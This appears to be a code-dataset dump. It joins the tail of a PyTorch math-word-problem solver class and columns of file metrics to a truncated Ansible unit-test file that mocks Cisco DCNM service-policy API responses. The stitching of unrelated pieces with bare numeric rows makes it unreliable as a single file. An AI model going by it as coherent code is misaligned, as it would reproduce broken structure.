for i in range(len(target)):
'''
if target[i] == unk:
num_stack = nums_stack_batch[i].pop()
max_score = -float("1e12")
for num in num_stack:
if decoder_output[i, num_start + num] > max_score:
target[i] = num + num_start
max_score = decoder_output[i, num_start + num]
'''
if target_input[i] >= num_start:
target_input[i] = 0
return torch.LongTensor(target), torch.LongTensor(target_input)
def generate_tree_input_(self, target, decoder_output, nums_stack_batch, num_start, unk):
target_input = copy.deepcopy(target)
for i in range(len(target)):
if target[i] == unk:
num_stack = nums_stack_batch[i].pop()
max_score = -float("1e12")
for num in num_stack:
if decoder_output[i, num_start + num] > max_score:
target[i] = num + num_start
max_score = decoder_output[i, num_start + num]
if target_input[i] >= num_start:
target_input[i] = 0
return torch.LongTensor(target), torch.LongTensor(target_input)
def copy_list(self, l):
r = []
if len(l) == 0:
return r
for i in l:
if type(i) is list:
r.append(self.copy_list(i))
else:
r.append(i)
return r
def convert_idx2symbol(self, output, num_list, num_stack):
#batch_size=output.size(0)
'''batch_size=1'''
seq_len = len(output)
num_len = len(num_list)
output_list = []
res = []
for s_i in range(seq_len):
idx = output[s_i]
if idx in [self.out_sos_token, self.out_eos_token, self.out_pad_token]:
break
symbol = self.out_idx2symbol[idx]
if "NUM" in symbol:
num_idx = self.mask_list.index(symbol)
if num_idx >= num_len:
res = []
break
res.append(num_list[num_idx])
elif symbol == SpecialTokens.UNK_TOKEN:
try:
pos_list = num_stack.pop()
c = num_list[pos_list[0]]
res.append(c)
except:
return None
else:
res.append(symbol)
output_list.append(res)
return output_list
def __str__(self):
info = super().__str__()
total = sum(p.numel() for p in self.parameters())
trainable = sum(p.numel() for p in self.parameters() if p.requires_grad)
parameters = "\ntotal parameters : {} \ntrainable parameters : {}".format(total, trainable)
return info + parameters
| 49.649601
| 199
| 0.579513
| 8,973
| 74,673
| 4.510309
| 0.04012
| 0.021744
| 0.02041
| 0.021349
| 0.920882
| 0.911418
| 0.900818
| 0.89338
| 0.880927
| 0.873341
| 0
| 0.01112
| 0.31958
| 74,673
| 1,503
| 200
| 49.682635
| 0.785412
| 0.426486
| 0
| 0.728183
| 0
| 0
| 0.015542
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031474
| false
| 0
| 0.020029
| 0
| 0.088698
| 0.007153
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
df1804ab1e1e75435f1c7f51e3986ca00b0880f3
| 86,782
|
py
|
Python
|
tests/unit/modules/dcnm/test_dcnm_service_policy.py
|
CiscoDevNet/ansible-dcnm
|
1fa025085342d7d57fc4588471504d3089bd296f
|
[
"Apache-2.0"
] | 28
|
2020-07-19T02:56:38.000Z
|
2022-03-03T01:28:10.000Z
|
tests/unit/modules/dcnm/test_dcnm_service_policy.py
|
CiscoDevNet/ansible-dcnm
|
1fa025085342d7d57fc4588471504d3089bd296f
|
[
"Apache-2.0"
] | 67
|
2020-07-17T21:49:00.000Z
|
2022-03-20T14:59:23.000Z
|
tests/unit/modules/dcnm/test_dcnm_service_policy.py
|
CiscoDevNet/ansible-dcnm
|
1fa025085342d7d57fc4588471504d3089bd296f
|
[
"Apache-2.0"
] | 18
|
2020-07-07T14:42:22.000Z
|
2022-03-09T12:31:13.000Z
|
#!/usr/bin/python
#
# Copyright (c) 2020 Cisco and/or its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible_collections.ansible.netcommon.tests.unit.compat.mock import patch
from ansible_collections.cisco.dcnm.plugins.modules import dcnm_service_policy
from .dcnm_module import TestDcnmModule, set_module_args, loadPlaybookData
import json, copy
class TestDcnmServicePolicyModule(TestDcnmModule):
module = dcnm_service_policy
fd = None
def init_data(self):
self.fd = None
def log_msg (self, msg):
if (self.fd is None):
self.fd = open("sp-ut.log", "w+")
self.fd.write (msg)
def setUp(self):
super(TestDcnmServicePolicyModule, self).setUp()
self.mock_dcnm_send = patch('ansible_collections.cisco.dcnm.plugins.modules.dcnm_service_policy.dcnm_send')
self.run_dcnm_send = self.mock_dcnm_send.start()
self.mock_dcnm_reset_connection = patch('ansible_collections.cisco.dcnm.plugins.modules.dcnm_service_policy.dcnm_reset_connection')
self.run_dcnm_reset_connection = self.mock_dcnm_reset_connection.start()
def tearDown(self):
super(TestDcnmServicePolicyModule, self).tearDown()
self.mock_dcnm_send.stop()
self.mock_dcnm_reset_connection.stop()
#################################### FIXTURES ############################
def load_sp_fixtures (self):
if ('test_dcnm_sp_merged_new' == self._testMethodName):
have_sp1_resp = []
have_sp2_resp = []
have_sp3_resp = []
get_snt_resp1 = self.payloads_data.get('get_snt1_response')
get_snt_resp2 = self.payloads_data.get('get_snt2_response')
create_sp1_resp = self.payloads_data.get('create_sp1_resp')
create_sp2_resp = self.payloads_data.get('create_sp2_resp')
create_sp3_resp = self.payloads_data.get('create_sp3_resp')
deploy_sp1_resp = self.payloads_data.get('deploy_sp1_resp')
deploy_sp2_sp3_resp = self.payloads_data.get('deploy_sp2_sp3_resp')
get_sn1_att_status = self.payloads_data.get('get_sn1_att_status')
get_sn2_att_status = self.payloads_data.get('get_sn2_att_status')
self.run_dcnm_send.side_effect = [
get_snt_resp1, get_snt_resp2, get_snt_resp2,
have_sp1_resp, have_sp2_resp, have_sp3_resp,
create_sp1_resp, create_sp2_resp, create_sp3_resp,
deploy_sp1_resp, deploy_sp2_sp3_resp,
get_sn1_att_status,
get_sn2_att_status,
get_sn2_att_status
]
if ('test_dcnm_sp_merged_new_no_opt_elems' == self._testMethodName):
have_sp1_resp = []
have_sp2_resp = []
get_snt_resp1 = self.payloads_data.get('get_snt1_response')
get_snt_resp2 = self.payloads_data.get('get_snt2_response')
create_sp1_resp = self.payloads_data.get('create_sp1_resp')
create_sp2_resp = self.payloads_data.get('create_sp2_resp')
deploy_sp1_resp = self.payloads_data.get('deploy_sp1_resp')
deploy_sp2_sp3_resp = self.payloads_data.get('deploy_sp2_sp3_resp')
get_sn1_att_status = self.payloads_data.get('get_sn1_att_status')
get_sn2_att_status = self.payloads_data.get('get_sn2_att_status')
self.run_dcnm_send.side_effect = [
get_snt_resp1, get_snt_resp2,
have_sp1_resp, have_sp2_resp,
create_sp1_resp, create_sp2_resp,
deploy_sp1_resp, deploy_sp2_sp3_resp,
get_sn1_att_status,
get_sn2_att_status
]
if ('test_dcnm_sp_merged_existing_no_opt_elems' == self._testMethodName):
have_sp1_resp = self.payloads_data.get('get_sp1_resp')
have_sp2_resp = self.payloads_data.get('get_sp2_resp')
get_sn1_att_status = self.payloads_data.get('get_sn1_att_status')
get_sn2_att_status = self.payloads_data.get('get_sn2_att_status')
get_snt_resp1 = self.payloads_data.get('get_snt1_response')
get_snt_resp2 = self.payloads_data.get('get_snt2_response')
create_sp1_resp = self.payloads_data.get('create_sp1_resp')
create_sp2_resp = self.payloads_data.get('create_sp2_resp')
deploy_sp1_resp = self.payloads_data.get('deploy_sp1_resp')
deploy_sp2_sp3_resp = self.payloads_data.get('deploy_sp2_sp3_resp')
get_sn1_att_status = self.payloads_data.get('get_sn1_att_status')
get_sn2_att_status = self.payloads_data.get('get_sn2_att_status')
self.run_dcnm_send.side_effect = [
get_snt_resp1, get_snt_resp2,
have_sp1_resp, have_sp2_resp,
get_sn1_att_status, get_sn2_att_status,
create_sp1_resp, create_sp2_resp,
deploy_sp1_resp, deploy_sp2_sp3_resp,
get_sn1_att_status,
get_sn2_att_status
]
if ('test_dcnm_sp_merged_new_check_mode' == self._testMethodName):
pass
if ('test_dcnm_sp_merged_new_unauth_error' == self._testMethodName):
have_sp1_resp = []
have_sp2_resp = []
get_snt_resp1 = self.payloads_data.get('get_snt1_response')
get_snt_resp2 = self.payloads_data.get('get_snt2_response')
create_sp1_resp = self.payloads_data.get('create_sp1_resp')
create_sp2_resp = self.payloads_data.get('create_sp2_resp')
deploy_sp1_resp = self.payloads_data.get('deploy_sp1_resp')
deploy_sp2_sp3_resp = self.payloads_data.get('deploy_sp2_sp3_resp')
resp_unauth_err = self.payloads_data.get('resp_unauth_err')
get_sn1_att_status = self.payloads_data.get('get_sn1_att_status')
get_sn2_att_status = self.payloads_data.get('get_sn2_att_status')
self.run_dcnm_send.side_effect = [
get_snt_resp1, get_snt_resp2,
have_sp1_resp, have_sp2_resp,
resp_unauth_err, [],
create_sp1_resp, create_sp2_resp,
deploy_sp1_resp, deploy_sp2_sp3_resp,
get_sn1_att_status,
get_sn2_att_status
]
if ('test_dcnm_sp_config_without_state' == self._testMethodName):
have_sp1_resp = []
have_sp2_resp = []
have_sp3_resp = []
get_snt_resp1 = self.payloads_data.get('get_snt1_response')
get_snt_resp2 = self.payloads_data.get('get_snt2_response')
get_snt_resp3 = self.payloads_data.get('get_snt2_response')
create_sp1_resp = self.payloads_data.get('create_sp1_resp')
create_sp2_resp = self.payloads_data.get('create_sp2_resp')
create_sp3_resp = self.payloads_data.get('create_sp3_resp')
deploy_sp1_resp = self.payloads_data.get('deploy_sp1_resp')
deploy_sp2_sp3_resp = self.payloads_data.get('deploy_sp2_sp3_resp')
get_sn1_att_status = self.payloads_data.get('get_sn1_att_status')
get_sn2_att_status = self.payloads_data.get('get_sn2_att_status')
self.run_dcnm_send.side_effect = [
get_snt_resp1, get_snt_resp2, get_snt_resp3,
have_sp1_resp, have_sp2_resp, have_sp3_resp,
create_sp1_resp, create_sp2_resp, create_sp3_resp,
deploy_sp1_resp, deploy_sp2_sp3_resp,
get_sn1_att_status, get_sn2_att_status,
get_sn2_att_status
]
if ('test_dcnm_sp_merge_no_deploy' == self._testMethodName):
have_sp1_resp = []
have_sp2_resp = []
have_sp3_resp = []
get_snt_resp1 = self.payloads_data.get('get_snt1_response')
get_snt_resp2 = self.payloads_data.get('get_snt2_response')
get_snt_resp3 = self.payloads_data.get('get_snt2_response')
create_sp1_resp = self.payloads_data.get('create_sp1_resp')
create_sp2_resp = self.payloads_data.get('create_sp2_resp')
create_sp3_resp = self.payloads_data.get('create_sp3_resp')
deploy_sp1_resp = self.payloads_data.get('deploy_sp1_resp')
deploy_sp2_sp3_resp = self.payloads_data.get('deploy_sp2_sp3_resp')
get_sn1_att_status = self.payloads_data.get('get_sn1_att_status')
get_sn2_att_status = self.payloads_data.get('get_sn2_att_status')
self.run_dcnm_send.side_effect = [
get_snt_resp1, get_snt_resp2, get_snt_resp3,
have_sp1_resp, have_sp2_resp, have_sp3_resp,
create_sp1_resp, create_sp2_resp, create_sp3_resp,
deploy_sp1_resp, deploy_sp2_sp3_resp,
get_sn1_att_status,
get_sn2_att_status,
get_sn2_att_status
]
pass
if ('test_dcnm_sp_merge_deploy_false' == self._testMethodName):
have_sp1_resp = []
have_sp2_resp = []
have_sp3_resp = []
get_snt_resp1 = self.payloads_data.get('get_snt1_response')
get_snt_resp2 = self.payloads_data.get('get_snt2_response')
get_snt_resp3 = self.payloads_data.get('get_snt2_response')
create_sp1_resp = self.payloads_data.get('create_sp1_resp')
create_sp2_resp = self.payloads_data.get('create_sp2_resp')
create_sp3_resp = self.payloads_data.get('create_sp3_resp')
self.run_dcnm_send.side_effect = [
get_snt_resp1, get_snt_resp2, get_snt_resp3,
have_sp1_resp, have_sp2_resp, have_sp3_resp,
create_sp1_resp, create_sp2_resp, create_sp3_resp,
]
if ('test_dcnm_sp_merged_existing_and_non_existing' == self._testMethodName):
have_sp1_resp = self.payloads_data.get('get_sp1_resp')
have_sp2_resp = []
have_sp3_resp = []
get_sn1_att_status = self.payloads_data.get('get_sn1_att_status')
get_sn2_att_status = self.payloads_data.get('get_sn2_att_status')
get_snt_resp1 = self.payloads_data.get('get_snt1_response')
get_snt_resp2 = self.payloads_data.get('get_snt2_response')
get_snt_resp3 = self.payloads_data.get('get_snt2_response')
create_sp2_resp = self.payloads_data.get('create_sp2_resp')
create_sp3_resp = self.payloads_data.get('create_sp3_resp')
deploy_sp2_sp3_resp = self.payloads_data.get('deploy_sp2_sp3_resp')
get_sn1_att_status = self.payloads_data.get('get_sn1_att_status')
get_sn2_att_status = self.payloads_data.get('get_sn2_att_status')
self.run_dcnm_send.side_effect = [
get_snt_resp1, get_snt_resp2, get_snt_resp3,
have_sp1_resp, have_sp2_resp, have_sp3_resp,
get_sn1_att_status,
create_sp2_resp, create_sp3_resp,
deploy_sp2_sp3_resp,
get_sn2_att_status,
get_sn2_att_status
]
pass
if ('test_dcnm_sp_merged_update_existing' == self._testMethodName):
pass
if ('test_dcnm_sp_delete_existing_no_config' == self._testMethodName):
get_snodes_resp = self.payloads_data.get('get_service_nodes_resp')
get_policy_with_sn1 = self.payloads_data.get('get_policy_with_sn1')
get_policy_with_sn2 = self.payloads_data.get('get_policy_with_sn2')
det_sp1_resp = self.payloads_data.get('detach_sp1_resp')
det_sp2_sp3_resp = self.payloads_data.get('detach_sp2_sp3_resp')
delete_sp1_resp = self.payloads_data.get('delete_sp1_resp')
delete_sp2_resp = self.payloads_data.get('delete_sp2_resp')
delete_sp3_resp = self.payloads_data.get('delete_sp3_resp')
deploy_sp1_resp = self.payloads_data.get('deploy_sp1_resp')
deploy_sp2_sp3_resp = self.payloads_data.get('deploy_sp2_sp3_resp')
get_dd_sn1_att_status = self.payloads_data.get('get_dd_sn1_att_status')
get_dd_sn2_att_status = self.payloads_data.get('get_dd_sn2_att_status')
self.run_dcnm_send.side_effect = [
get_snodes_resp,
get_policy_with_sn1, get_policy_with_sn2,
det_sp1_resp, det_sp2_sp3_resp,
deploy_sp1_resp, deploy_sp2_sp3_resp,
get_dd_sn1_att_status,
get_dd_sn2_att_status,
get_dd_sn2_att_status,
delete_sp1_resp, delete_sp2_resp,
delete_sp3_resp
]
if ('test_dcnm_sp_delete_existing_with_node_names' == self._testMethodName):
get_policy_with_sn1 = self.payloads_data.get('get_policy_with_sn1')
get_policy_with_sn2 = self.payloads_data.get('get_policy_with_sn2')
det_sp1_resp = self.payloads_data.get('detach_sp1_resp')
det_sp2_sp3_resp = self.payloads_data.get('detach_sp2_sp3_resp')
delete_sp1_resp = self.payloads_data.get('delete_sp1_resp')
delete_sp2_resp = self.payloads_data.get('delete_sp2_resp')
delete_sp3_resp = self.payloads_data.get('delete_sp3_resp')
deploy_sp1_resp = self.payloads_data.get('deploy_sp1_resp')
deploy_sp2_sp3_resp = self.payloads_data.get('deploy_sp2_sp3_resp')
get_dd_sn1_att_status = self.payloads_data.get('get_dd_sn1_att_status')
get_dd_sn2_att_status = self.payloads_data.get('get_dd_sn2_att_status')
self.run_dcnm_send.side_effect = [
get_policy_with_sn1, get_policy_with_sn2,
det_sp1_resp, det_sp2_sp3_resp,
deploy_sp1_resp, deploy_sp2_sp3_resp,
get_dd_sn1_att_status,
get_dd_sn2_att_status,
get_dd_sn2_att_status,
delete_sp1_resp, delete_sp2_resp,
delete_sp3_resp
]
if ('test_dcnm_sp_delete_existing_with_node_name_and_policy_name' == self._testMethodName):
have_sp1_resp = self.payloads_data.get('get_sp1_resp')
have_sp2_resp = self.payloads_data.get('get_sp2_resp')
have_sp3_resp = self.payloads_data.get('get_sp3_resp')
det_sp1_resp = self.payloads_data.get('detach_sp1_resp')
det_sp2_sp3_resp = self.payloads_data.get('detach_sp2_sp3_resp')
delete_sp1_resp = self.payloads_data.get('delete_sp1_resp')
delete_sp2_resp = self.payloads_data.get('delete_sp2_resp')
delete_sp3_resp = self.payloads_data.get('delete_sp3_resp')
get_dd_sn1_att_status = self.payloads_data.get('get_dd_sn1_att_status')
get_dd_sn2_att_status = self.payloads_data.get('get_dd_sn2_att_status')
deploy_sp1_resp = self.payloads_data.get('deploy_sp1_resp')
deploy_sp2_sp3_resp = self.payloads_data.get('deploy_sp2_sp3_resp')
self.run_dcnm_send.side_effect = [
have_sp1_resp, have_sp2_resp, have_sp3_resp,
det_sp1_resp, det_sp2_sp3_resp,
deploy_sp1_resp, deploy_sp2_sp3_resp,
get_dd_sn1_att_status,
get_dd_sn2_att_status,
get_dd_sn2_att_status,
delete_sp1_resp, delete_sp2_resp,
delete_sp3_resp
]
if ('test_dcnm_sp_delete_existing_with_node_name_and_rp_name' == self._testMethodName):
get_policy_with_sn1 = self.payloads_data.get('get_policy_with_sn1')
get_policy_with_sn2 = self.payloads_data.get('get_policy_with_sn2')
det_sp1_resp = self.payloads_data.get('detach_sp1_resp')
det_sp2_sp3_resp = self.payloads_data.get('detach_sp2_sp3_resp')
delete_sp1_resp = self.payloads_data.get('delete_sp1_resp')
delete_sp2_resp = self.payloads_data.get('delete_sp2_resp')
delete_sp3_resp = self.payloads_data.get('delete_sp3_resp')
deploy_sp1_resp = self.payloads_data.get('deploy_sp1_resp')
deploy_sp2_sp3_resp = self.payloads_data.get('deploy_sp2_sp3_resp')
get_dd_sn1_att_status = self.payloads_data.get('get_dd_sn1_att_status')
get_dd_sn2_att_status = self.payloads_data.get('get_dd_sn2_att_status')
self.run_dcnm_send.side_effect = [
get_policy_with_sn1, get_policy_with_sn2,
det_sp1_resp, det_sp2_sp3_resp,
deploy_sp1_resp, deploy_sp2_sp3_resp,
get_dd_sn1_att_status,
get_dd_sn2_att_status,
delete_sp1_resp, delete_sp2_resp
]
if ('test_dcnm_sp_delete_existing_detach_unauth_err' == self._testMethodName):
have_sp1_resp = self.payloads_data.get('get_sp1_resp')
have_sp2_resp = self.payloads_data.get('get_sp2_resp')
have_sp3_resp = self.payloads_data.get('get_sp3_resp')
det_sp1_resp = self.payloads_data.get('detach_sp1_resp')
det_sp2_sp3_resp = self.payloads_data.get('detach_sp2_sp3_resp')
delete_sp1_resp = self.payloads_data.get('delete_sp1_resp')
delete_sp2_resp = self.payloads_data.get('delete_sp2_resp')
delete_sp3_resp = self.payloads_data.get('delete_sp3_resp')
deploy_sp1_resp = self.payloads_data.get('deploy_sp1_resp')
deploy_sp2_sp3_resp = self.payloads_data.get('deploy_sp2_sp3_resp')
resp_unauth_err = self.payloads_data.get('resp_unauth_err')
get_dd_sn1_att_status = self.payloads_data.get('get_dd_sn1_att_status')
get_dd_sn2_att_status = self.payloads_data.get('get_dd_sn2_att_status')
self.run_dcnm_send.side_effect = [
have_sp1_resp, have_sp2_resp, have_sp3_resp,
resp_unauth_err, det_sp1_resp, det_sp2_sp3_resp,
deploy_sp1_resp, deploy_sp2_sp3_resp,
get_dd_sn1_att_status,
get_dd_sn2_att_status,
get_dd_sn2_att_status,
delete_sp1_resp, delete_sp2_resp,
delete_sp3_resp
]
if ('test_dcnm_sp_delete_existing_delete_deploy_unauth_err' == self._testMethodName):
have_sp1_resp = self.payloads_data.get('get_sp1_resp')
have_sp2_resp = self.payloads_data.get('get_sp2_resp')
have_sp3_resp = self.payloads_data.get('get_sp3_resp')
det_sp1_resp = self.payloads_data.get('detach_sp1_resp')
det_sp2_sp3_resp = self.payloads_data.get('detach_sp2_sp3_resp')
delete_sp1_resp = self.payloads_data.get('delete_sp1_resp')
delete_sp2_resp = self.payloads_data.get('delete_sp2_resp')
delete_sp3_resp = self.payloads_data.get('delete_sp3_resp')
deploy_sp1_resp = self.payloads_data.get('deploy_sp1_resp')
deploy_sp2_sp3_resp = self.payloads_data.get('deploy_sp2_sp3_resp')
get_dd_sn1_att_status = self.payloads_data.get('get_dd_sn1_att_status')
get_dd_sn2_att_status = self.payloads_data.get('get_dd_sn2_att_status')
resp_unauth_err = self.payloads_data.get('resp_unauth_err')
self.run_dcnm_send.side_effect = [
have_sp1_resp, have_sp2_resp, have_sp3_resp,
det_sp1_resp, det_sp2_sp3_resp,
resp_unauth_err, deploy_sp1_resp, deploy_sp2_sp3_resp,
get_dd_sn1_att_status,
get_dd_sn2_att_status,
get_dd_sn2_att_status,
delete_sp1_resp, delete_sp2_resp,
delete_sp3_resp
]
if ('test_dcnm_sp_delete_existing_delete_unauth_err' == self._testMethodName):
have_sp1_resp = self.payloads_data.get('get_sp1_resp')
have_sp2_resp = self.payloads_data.get('get_sp2_resp')
have_sp3_resp = self.payloads_data.get('get_sp3_resp')
det_sp1_resp = self.payloads_data.get('detach_sp1_resp')
det_sp2_sp3_resp = self.payloads_data.get('detach_sp2_sp3_resp')
delete_sp1_resp = self.payloads_data.get('delete_sp1_resp')
delete_sp2_resp = self.payloads_data.get('delete_sp2_resp')
delete_sp3_resp = self.payloads_data.get('delete_sp3_resp')
deploy_sp1_resp = self.payloads_data.get('deploy_sp1_resp')
deploy_sp2_sp3_resp = self.payloads_data.get('deploy_sp2_sp3_resp')
resp_unauth_err = self.payloads_data.get('resp_unauth_err')
get_dd_sn1_att_status = self.payloads_data.get('get_dd_sn1_att_status')
get_dd_sn2_att_status = self.payloads_data.get('get_dd_sn2_att_status')
self.run_dcnm_send.side_effect = [
have_sp1_resp, have_sp2_resp, have_sp3_resp,
det_sp1_resp, det_sp2_sp3_resp,
deploy_sp1_resp, deploy_sp2_sp3_resp,
get_dd_sn1_att_status,
get_dd_sn2_att_status,
get_dd_sn2_att_status,
resp_unauth_err, delete_sp1_resp, delete_sp2_resp,
delete_sp3_resp
]
if ('test_dcnm_sp_delete_existing_and_non_existing' == self._testMethodName):
have_sp1_resp = []
have_sp2_resp = self.payloads_data.get('get_sp2_resp')
have_sp3_resp = self.payloads_data.get('get_sp3_resp')
det_sp2_sp3_resp = self.payloads_data.get('detach_sp2_sp3_resp')
delete_sp2_resp = self.payloads_data.get('delete_sp2_resp')
delete_sp3_resp = self.payloads_data.get('delete_sp3_resp')
deploy_sp2_sp3_resp = self.payloads_data.get('deploy_sp2_sp3_resp')
get_dd_sn2_att_status = self.payloads_data.get('get_dd_sn2_att_status')
self.run_dcnm_send.side_effect = [
have_sp1_resp, have_sp2_resp, have_sp3_resp,
det_sp2_sp3_resp,
deploy_sp2_sp3_resp,
get_dd_sn2_att_status,
get_dd_sn2_att_status,
delete_sp2_resp,
delete_sp3_resp
]
if ('test_dcnm_sp_delete_non_existing' == self._testMethodName):
self.run_dcnm_send.side_effect = [[], [], [], [], [], [], []]
if ('test_dcnm_sp_replace_sp1_to_sp3_non_existing' == self._testMethodName):
have_sp1_resp = []
have_sp2_resp = []
have_sp3_resp = []
get_sp1_resp = self.payloads_data.get('get_sp1_resp')
get_snt_resp1 = self.payloads_data.get('get_snt1_response')
get_snt_resp2 = self.payloads_data.get('get_snt2_response')
get_snt_resp3 = self.payloads_data.get('get_snt2_response')
create_sp1_resp = self.payloads_data.get('create_sp1_resp')
create_sp2_resp = self.payloads_data.get('create_sp2_resp')
create_sp3_resp = self.payloads_data.get('create_sp3_resp')
deploy_sp1_resp = self.payloads_data.get('deploy_sp1_resp')
deploy_sp2_sp3_resp = self.payloads_data.get('deploy_sp2_sp3_resp')
resp_unauth_err = self.payloads_data.get('resp_unauth_err')
get_sn1_att_status = self.payloads_data.get('get_sn1_att_status')
get_sn2_att_status = self.payloads_data.get('get_sn2_att_status')
self.run_dcnm_send.side_effect = [
get_snt_resp1, get_snt_resp2, get_snt_resp3,
have_sp1_resp, have_sp2_resp, have_sp3_resp,
resp_unauth_err, get_sp1_resp,
create_sp1_resp, create_sp2_resp, create_sp3_resp,
resp_unauth_err,
deploy_sp1_resp, deploy_sp2_sp3_resp ,
get_sn1_att_status,
get_sn2_att_status,
get_sn2_att_status
]
if ('test_dcnm_sp_replace_sp1_to_sp3_existing' == self._testMethodName):
have_sp1_resp = self.payloads_data.get('get_sp1_resp')
have_sp2_resp = self.payloads_data.get('get_sp2_resp')
have_sp3_resp = self.payloads_data.get('get_sp3_resp')
get_snt_resp1 = self.payloads_data.get('get_snt1_response')
get_snt_resp2 = self.payloads_data.get('get_snt2_response')
get_snt_resp3 = self.payloads_data.get('get_snt2_response')
get_sn1_att_status = self.payloads_data.get('get_sn1_att_status')
get_sn2_att_status = self.payloads_data.get('get_sn2_att_status')
create_sp1_resp = self.payloads_data.get('create_sp1_resp')
create_sp2_resp = self.payloads_data.get('create_sp2_resp')
create_sp3_resp = self.payloads_data.get('create_sp3_resp')
deploy_sp1_resp = self.payloads_data.get('deploy_sp1_resp')
deploy_sp2_sp3_resp = self.payloads_data.get('deploy_sp2_sp3_resp')
get_sn1_att_status = self.payloads_data.get('get_sn1_att_status')
get_sn2_att_status = self.payloads_data.get('get_sn2_att_status')
self.run_dcnm_send.side_effect = [
get_snt_resp1, get_snt_resp2, get_snt_resp3,
have_sp1_resp, have_sp2_resp, have_sp3_resp,
get_sn1_att_status, get_sn2_att_status,
create_sp1_resp, create_sp2_resp, create_sp3_resp,
deploy_sp1_resp, deploy_sp2_sp3_resp,
get_sn1_att_status,
get_sn2_att_status,
get_sn2_att_status
]
if ('test_dcnm_sp_replace_sp1_to_sp3_existing_no_change' == self._testMethodName):
have_sp1_resp = self.payloads_data.get('get_sp1_resp')
have_sp2_resp = self.payloads_data.get('get_sp2_resp')
have_sp3_resp = self.payloads_data.get('get_sp3_resp')
get_sn1_att_status = self.payloads_data.get('get_sn1_att_status')
get_sn2_att_status = self.payloads_data.get('get_sn2_att_status')
get_snt_resp1 = self.payloads_data.get('get_snt1_response')
get_snt_resp2 = self.payloads_data.get('get_snt2_response')
get_snt_resp3 = self.payloads_data.get('get_snt2_response')
self.run_dcnm_send.side_effect = [
get_snt_resp1, get_snt_resp2, get_snt_resp3,
have_sp1_resp, have_sp2_resp, have_sp3_resp,
get_sn1_att_status, get_sn2_att_status
]
if ('test_dcnm_sp_override_with_new_peerings' == self._testMethodName):
have_sp1_resp = []
get_snodes_resp = self.payloads_data.get('get_service_nodes_resp')
get_policy_with_sn1 = self.payloads_data.get('get_policy_with_sn1')
get_policy_with_sn2 = self.payloads_data.get('get_policy_with_sn2')
get_snt_resp1 = self.payloads_data.get('get_snt1_response')
create_sp1_resp = self.payloads_data.get('create_sp1_resp')
det_sp2_sp3_resp = self.payloads_data.get('detach_sp2_sp3_resp')
delete_sp2_resp = self.payloads_data.get('delete_sp2_resp')
delete_sp3_resp = self.payloads_data.get('delete_sp3_resp')
deploy_sp1_resp = self.payloads_data.get('deploy_sp1_resp')
deploy_sp2_sp3_resp = self.payloads_data.get('deploy_sp2_sp3_resp')
get_sn1_att_status = self.payloads_data.get('get_sn1_att_status')
get_sn2_att_status = self.payloads_data.get('get_sn2_att_status')
get_dd_sn1_att_status = self.payloads_data.get('get_dd_sn1_att_status')
get_dd_sn2_att_status = self.payloads_data.get('get_dd_sn2_att_status')
self.run_dcnm_send.side_effect = [
get_snt_resp1,
have_sp1_resp,
get_snodes_resp,
get_policy_with_sn1, get_policy_with_sn2,
create_sp1_resp,
det_sp2_sp3_resp,
deploy_sp2_sp3_resp,
get_dd_sn2_att_status,
get_dd_sn2_att_status,
delete_sp2_resp, delete_sp3_resp,
deploy_sp1_resp,
get_sn1_att_status,
]
if ('test_dcnm_sp_override_with_existing_peering' == self._testMethodName):
get_sn1_att_status = self.payloads_data.get('get_sn1_att_status')
get_sn2_att_status = self.payloads_data.get('get_sn2_att_status')
have_sp1_resp = self.payloads_data.get('get_sp1_resp')
get_sn1_att_status = self.payloads_data.get('get_sn1_att_status')
get_snodes_resp = self.payloads_data.get('get_service_nodes_resp')
get_policy_with_sn1 = self.payloads_data.get('get_policy_with_sn1')
get_policy_with_sn2 = self.payloads_data.get('get_policy_with_sn2')
get_snt_resp1 = self.payloads_data.get('get_snt1_response')
det_sp2_sp3_resp = self.payloads_data.get('detach_sp2_sp3_resp')
delete_sp2_resp = self.payloads_data.get('delete_sp2_resp')
delete_sp3_resp = self.payloads_data.get('delete_sp3_resp')
deploy_sp2_sp3_resp = self.payloads_data.get('deploy_sp2_sp3_resp')
get_dd_sn1_att_status = self.payloads_data.get('get_dd_sn1_att_status')
get_dd_sn2_att_status = self.payloads_data.get('get_dd_sn2_att_status')
self.run_dcnm_send.side_effect = [
get_snt_resp1,
have_sp1_resp,
get_snodes_resp,
get_policy_with_sn1, get_policy_with_sn2,
get_sn1_att_status,
det_sp2_sp3_resp,
deploy_sp2_sp3_resp,
get_dd_sn2_att_status,
get_dd_sn2_att_status,
delete_sp2_resp, delete_sp3_resp
]
if ('test_dcnm_sp_override_with_existing_peering_updated' == self._testMethodName):
have_sp1_resp = self.payloads_data.get('get_sp1_resp')
get_snodes_resp = self.payloads_data.get('get_service_nodes_resp')
get_policy_with_sn1 = self.payloads_data.get('get_policy_with_sn1')
get_policy_with_sn2 = self.payloads_data.get('get_policy_with_sn2')
get_snt_resp1 = self.payloads_data.get('get_snt1_response')
get_sn1_att_status = self.payloads_data.get('get_sn1_att_status')
create_sp1_resp = self.payloads_data.get('create_sp1_resp')
det_sp2_sp3_resp = self.payloads_data.get('detach_sp2_sp3_resp')
deploy_sp1_resp = self.payloads_data.get('deploy_sp1_resp')
deploy_sp2_sp3_resp = self.payloads_data.get('deploy_sp2_sp3_resp')
delete_sp2_resp = self.payloads_data.get('delete_sp2_resp')
delete_sp3_resp = self.payloads_data.get('delete_sp3_resp')
get_sn1_att_status = self.payloads_data.get('get_sn1_att_status')
get_sn2_att_status = self.payloads_data.get('get_sn2_att_status')
get_dd_sn1_att_status = self.payloads_data.get('get_dd_sn1_att_status')
get_dd_sn2_att_status = self.payloads_data.get('get_dd_sn2_att_status')
self.run_dcnm_send.side_effect = [
get_snt_resp1,
have_sp1_resp,
get_snodes_resp,
